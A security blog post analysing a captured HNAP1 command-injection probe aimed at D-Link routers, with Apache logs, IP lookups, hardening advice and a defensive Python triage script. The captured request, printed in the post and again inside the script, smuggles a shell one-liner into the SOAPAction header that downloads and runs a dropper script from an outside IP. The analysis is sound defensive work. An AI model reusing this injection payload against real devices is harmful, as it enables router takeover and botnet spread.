by Fred Theilig
Security Onion threw up three alerts this week:
WGET Command Specifying Output in HTTP Headers
Possible D-Link Router HNAP Protocol Security Bypass Attempt
D-Link Devices Home Network Administration Protocol Command Execution
It was no surprise that all three were against my Apache server. First, let’s check out the logs:
68.69.185.58 - - [14/Aug/2024:04:23:13 -0400] "GET / HTTP/1.1" 200 51012 "-" "-"
68.69.185.58 - - [14/Aug/2024:04:23:15 -0400] "POST /HNAP1/ HTTP/1.1" 404 27331 "-" "Mozila/5.0"
The first line is a simple GET, but the second one is interesting. The 404 tells us Apache had no handler for that path, so whatever rode along in the request never reached anything that would act on it. But what is HNAP1? Rather than paraphrase, I will include what I found in the SANS Internet Storm Center’s diary archives:
HNAP (Home Network Administration Protocol) is a network device management protocol, useful for anyone, but I think meant primarily for ISPs to manage fleets of devices deployed as part of your internet subscription. It’s covered in US Patent 20070130286 (http://www.google.com/patents/US20070130286), and is nicely described in a Cisco doc found here http://www.cisco.com/web/partners/downloads/guest/hnap_protocol_whitepaper.pdf
The protocol was patented originally by Pure Networks, but the protocol is now owned by and the implementation has been carried forward by Cisco.
That protocol is what Security Onion’s signatures keyed on to flag this as a home-router attack. And while the Apache access log records little beyond the method, path and status, Security Onion captured the full request:
POST /HNAP1/ HTTP/1.1
Host: 68.9.162.73:8888
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://194.59.31.145/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh"
Content-Length: 0
The interesting part is the SOAPAction header. SOAP stands for Simple Object Access Protocol and you can read up on it here: https://www.w3.org/TR/2000/NOTE-SOAP-20000508/ HNAP1 is a SOAP-over-HTTP interface to the device’s management functions, and a legitimate SOAPAction value is just the namespace followed by one action name, here http://purenetworks.com/HNAP1/GetDeviceSettings. Everything after the action name is attacker-supplied shell text. It only does anything on a device whose HNAP handler drops the header’s contents into a shell without sanitizing them, which is the command-execution flaw the third alert is named for. In this case the intended target is a D-LINK router.
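As an added example (mine, not from the original post or from Security Onion), here is a small Python triage script that does by hand what the signatures did: it flags /HNAP1/ requests in Apache access-log lines, parses a captured request, splits a legitimate SOAPAction (namespace plus one action name) from any shell text appended after it, breaks that text into the individual commands, and pulls out the stage-two URL and host as indicators. The access-log lines and the request are the ones shown above; the benign request is constructed for contrast, and the regexes and function names are my own.

```python
"""Triage of an HNAP1 command-injection probe (added example, not from the post)."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Apache "combined" log format: host ident user [time] "request" status size "referer" "ua"
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A well-formed HNAP SOAPAction is the purenetworks.com namespace plus one
# action name; anything after the name is captured as "tail".
SOAPACTION_RE = re.compile(
    r'^"?https?://purenetworks\.com/HNAP1/(?P<action>\w+)(?P<tail>.*?)"?$'
)
SHELL_META_RE = re.compile(r';|&&|\|\||\||`|\$\(')  # separators / substitution
SPLIT_RE = re.compile(r'\s*(?:;|&&|\|\||\|)\s*')    # one-liner -> commands
URL_RE = re.compile(r'https?://[^\s;"\'|&<>]+')

# Log lines and request exactly as shown in the post.
ACCESS_LOG = [
    '68.69.185.58 - - [14/Aug/2024:04:23:13 -0400] "GET / HTTP/1.1" 200 51012 "-" "-"',
    '68.69.185.58 - - [14/Aug/2024:04:23:15 -0400] "POST /HNAP1/ HTTP/1.1" 404 27331 "-" "Mozila/5.0"',
]
SAMPLE_REQUEST = "\r\n".join([
    "POST /HNAP1/ HTTP/1.1",
    "Host: 68.9.162.73:8888",
    "User-Agent: Mozila/5.0",
    "Accept-Encoding: gzip, deflate",
    "Accept: */*",
    "Connection: keep-alive",
    'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/cd && cd tmp '
    "&& export PATH=$PATH:. && cd /tmp;wget http://194.59.31.145/wget.sh;"
    'chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh"',
    "Content-Length: 0", "", "",
])
# Constructed for contrast: what a legitimate HNAP client would send.
BENIGN_REQUEST = "\r\n".join([
    "POST /HNAP1/ HTTP/1.1",
    "Host: 192.168.0.1",
    'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"',
    "Content-Length: 0", "", "",
])


def hnap_hits(lines):
    """Return (ip, method, path, status) for access-log lines that touch /HNAP1/.

    A 404 means the web server had no handler for the path, so the header
    payload never reached an HNAP parser; the probe is still worth recording.
    """
    hits = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if m and m["path"].upper().startswith("/HNAP1"):
            hits.append((m["ip"], m["method"], m["path"], int(m["status"])))
    return hits


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, lower-cased header dict)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


@dataclass
class HnapFinding:
    action: str = ""          # SOAP action name, e.g. GetDeviceSettings
    injected: bool = False    # shell metacharacters found after the action name
    commands: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    hosts: list = field(default_factory=list)


def analyze_request(raw):
    """Classify a request; returns None if it is not HNAP traffic at all."""
    _method, path, headers = parse_request(raw)
    if not path.upper().startswith("/HNAP1"):
        return None
    finding = HnapFinding()
    m = SOAPACTION_RE.match(headers.get("soapaction", ""))
    if not m:
        return finding        # HNAP path but no parseable SOAPAction
    finding.action = m["action"]
    tail = m["tail"]
    if SHELL_META_RE.search(tail):
        finding.injected = True
        finding.commands = [c for c in SPLIT_RE.split(tail.lstrip("/ ")) if c]
        finding.urls = URL_RE.findall(tail)
        finding.hosts = sorted({urlparse(u).hostname for u in finding.urls})
    return finding


if __name__ == "__main__":
    print("access-log HNAP hits:", hnap_hits(ACCESS_LOG))
    for label, req in (("captured", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, analyze_request(req))
```

The split on the injected tail gives the eight commands in the order the shell would run them, and the URL list is the indicator to hand to whoever maintains your blocklists; the benign request parses to the same action name with nothing flagged, which is the distinction the signature has to make.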
Read as a shell one-liner, the text changes to /tmp (typically the one writable directory on an embedded device), downloads a file called wget.sh, makes it executable, runs it with the argument selfrep.dlink (the name suggests a self-replicating stage aimed at D-LINK devices, though that is a guess), then deletes it. Pretty standard dropper behaviour. So, let’s grab a copy of this file, ideally from an isolated analysis box rather than the server that was probed:
$ wget http://194.59.31.145/wget.sh
--2024-08-14 12:53:56-- http://194.59.31.145/wget.sh
Connecting to 194.59.31.145:80… failed: Connection refused.
Ok, so much for that. Doubly safe, it would seem: Apache had nothing listening at /HNAP1/, and the stage-two host was not serving the script when I checked, so even a vulnerable router hit by this request would have downloaded nothing. All we can do now is investigate the IP addresses:
68.69.185.58 – Provider: DediOutlet, LLC, Location: USA
194.59.31.145 – Location: Paris, Île-de-France, France (FR)
Both IPs are on DNS-based blocklists, so this was most likely automated bot activity rather than anything aimed at me: a forgotten server on the internet wielding a neutered weapon. I don’t use D-LINK products (friends don’t let friends …) so there was no chance of exploit, but if you do, consider updating the firmware, and make sure the router’s management interface, HNAP included, is not reachable from the WAN side. In fact, do this regardless of your router manufacturer. And if the device is past end of life, consider replacing it with a model from a vendor that is still shipping fixes. Also, patch everything, but that goes without saying.